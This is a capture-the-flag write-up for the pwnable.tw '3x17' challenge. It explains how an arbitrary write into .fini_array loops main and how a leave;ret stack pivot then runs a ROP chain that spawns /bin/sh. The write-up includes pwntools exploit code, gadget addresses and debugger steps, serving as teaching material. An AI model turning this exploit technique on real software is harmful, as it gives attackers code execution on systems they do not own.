Original challenge link: https://pwnable.tw/challenge/#32
You can as well download the file in my repo: 3x17.zip
And now, let's start!
First, we check the basic information of challenge file:
$ file 3x17
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=a9f43736cc372b3d1682efa57f19a4d5c70e41d3, stripped
$ checksec 3x17
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
This is a 64-bit stripped file with just NX enabled
. Next, let's decompile the file with ghidra to get the flow.
We can see there is just a function called entry
. In entry
, it acts like __libc_start_main
and calls the function at 0x401b6d
so we will rename that function to main
By running the program, we know that the function FUN_00446ec0
acts like write
and function FUN_00446e20
acts as read
. The other function in main is FUN_0040ee70
which will take the address and then do something with it so we will rename it to parse_addr
Reading the code of parse_addr
may be awful so let's debug with gdb-gef and input various style to see what can we get. First, let's set a breakpoint after the function parse_addr
gef➤ x/30i 0x401b6d # main
0x401be8: mov eax,0x0
0x401bed: call 0x40ee70
0x401bf2: cdqe
0x401bf4: mov QWORD PTR [rbp-0x28],rax
gef➤ b*0x401bf2
Breakpoint 1 at 0x401bf2
And let's run it and input various things from digit to character to see what will it return after executing parse_addr
(The return value will be put in rax
Wait! Can you see the value 0x4d2
in rax? 0x4d2
in decimal is 1234
which equal with our input. So we can conclude that the function parse_addr
is similar to atol
(You can try to input a large value or a negative number to get it).
And after it atol
our input, it will read
from user input to that address once and then exit. That means we can change any place just in case that address is writable.
At first, because we can change just 3 address from <our address>
, <our address>+0x8
and <our address>+0x10
in one input, the only approach is to analize the function after main
return (we can call it exit
function). Using gdb, we can find the function which acts as exit
and then analize it.
Although I can see that it executes a function which we can change that function to the address we want to execute. But without libc, we don't have one gadget
and if we make it executes main
again, it still returns and continues the exit function and then exits the program, or if we make it run from entry
, it will cause segfault.
So I got stuck from here. I'm sure that we will attack exit_hook or somethings like that but don't know what should we change. I then search gg for writeup and found this blog, and I learnt a new technique.
The technique is that we can change the .fini_array
, which is in the writable section, and exit
will call __libc_csu_fini
to run 2 destructor functions in .fini_array
but with a reverse order (call foo_destructor
and then _do_global_dtors_aux
). So if we change these 2 function in .fini_array
to main and the __libc_csu_fini
function calls .fini_array
again, we will have a loop of main. With the loop, we don't need to worry about the check in main
because that global variable is just 1 byte so looping of main will make that global variable back to 0
In addition, we can as well get the address of __libc_csu_fini
just by looking at the entry
again (or _start
if binary is not stripped) at 2 global variable (not main
The highlighted global variable is __libc_csu_fini
and the previous is __libc_csu_init
And with the loop of main, we can make a complete ROPchain and make it execute our ROPchain to get the shell.
- Stage 1: Overwrite
- Stage 2: Get shell with ROPchain
So first, in detail, we will change the foo_destructor
to main so that when program calls __libc_csu_fini
, it will call main
again. We also don't want it to exit after main
is called so we will change _do_global_dtors_aux
to __libc_csu_fini
to make sure the .fini_array
is not changed and make a complete loop of main.
So with the image above, we know the function __libc_csu_fini
is at 0x402960
. Analize that function and we know the address of .fini_array
is at 0x4b40f0
And with the images above, we know the address of main
is 0x401b6d
. We know where to write and what to write, let's make a script to overwrite .fini_array
from pwn import *
exe = context.binary = ELF('./3x17', checksec=False)
context.log_level = 'debug'
p = process(exe.path)
# p = remote('chall.pwnable.tw', 10105)
fini_array = 0x4b40f0
libc_csu_fini = 0x0402960
main = 0x401b6d
payload = flat(libc_csu_fini, main)
p.sendafter(b'addr:', f'{fini_array}'.encode())
p.sendafter(b'data:', payload)
And we know it ask for input again:
That's great! Let's move on!
Now, we will need to create our payload first. Our payload will get input from user so that we can input string /bin/sh
and then, execute syscall execve
with inputted string to get the shell. Let's find some gadgets:
$ ROPgadget --binary 3x17 > gadget
$ cat gadget | grep ret | grep ": pop "
0x000000000041e4af : pop rax ; ret
0x0000000000401696 : pop rdi ; ret
0x0000000000446e35 : pop rdx ; ret
0x0000000000406c30 : pop rsi ; ret
$ cat gadget | grep ": syscall"
0x00000000004022b4 : syscall
That's enough for us. Let's get the address where we can write using gdb:
So let's take 0x000000004b4a00
as a buffer. Our payload will be:
pop_rax = 0x000000000041e4af
pop_rdi = 0x0000000000401696
pop_rdx = 0x0000000000446e35
pop_rsi = 0x0000000000406c30
syscall = 0x00000000004022b4
rw_section = 0x000000004b4a00
read_addr = 0x446e20
payload = flat(
pop_rdi, 0,
pop_rsi, rw_section,
pop_rdx, 8,
pop_rax, 0x3b,
pop_rdi, rw_section,
pop_rsi, 0,
pop_rdx, 0,
Remember to set context.binary
before using flat()
. The address read_addr
is the function read
we've renamed above.
Now, we will need to write our payload to somewhere so that program can execute. The idea is to do a stack pivot because we can see when it jumps to __libc_csu_fini
, it will put a address which is writable to the rbp:
So if we can make the program execute leave ; ret
, the stack will be 0x000000004b40f8
and it will return to the address on that stack. But 0x4b40f8
is the address of .fini_array+8
so we will want to write our payload after .fini_array
(which means we will write our payload at .fini_array+0x10
). So the code will be as follows:
for i in range(0, len(payload), 0x18):
p.sendafter(b'addr:', f'{fini_array+0x10+i}'.encode())
p.sendafter(b'data:', payload[i:i+0x18])
Let's attach with gdb to check if our payload is inputted correctly or not:
We can see that our payload is inputted correctly.
After we inputted payload, the program will jump back to main and run until the check in main is satisfy, which means it will run until it read from user input. Remember that .fini_array
after we overwrited look likes:
So after the next input (main
), it will jump to __libc_csu_fini
. We first will want to change __libc_csu_fini
to gadget leave ; ret
so that we can pivot the stack.
After leave
instruction, the program will return back to main
(we didn't change that, just have change __libc_csu_fini
) so we will want to change main
into a ret
instruction. Overall, we will want to change the .fini_array
leave ; ret
Let's find those 2 gadget or just find the gadget leave ; ret
and then add 1
because leave
takes 1 byte:
$ cat gadget | grep ": leave ; ret"
0x0000000000401c4b : leave ; ret
And let's overwrite .fini_array
leave_ret = 0x0000000000401c4b
ret = leave_ret + 1
p.sendafter(b'addr:', f'{fini_array}'.encode())
p.sendafter(b'data:', flat(leave_ret, ret))
Let's run and attach with gdb to know if it can run our ROPchain. Stop at the call to a function inside .fini_array
in __libc_csu_fini
and check the .fini_array
Aha! We can see the leave ; ret
gadget. Let's type si
to see the stack change:
And the program execute ret
again to jump into our payload. Well, let's make it send the string /bin/sh\x00
and we can get the shell:
input("Press ENTER to continue...")
Why I added input()
? Because with the last input into main
, we just write 0x10
bytes, 8
bytes left, so if we send it continuously without hesitation, our string /bin/sh\x00
may input to that 8 bytes left and the payload is corrupted.
Full script: solve.py
The flag is at /home/3x17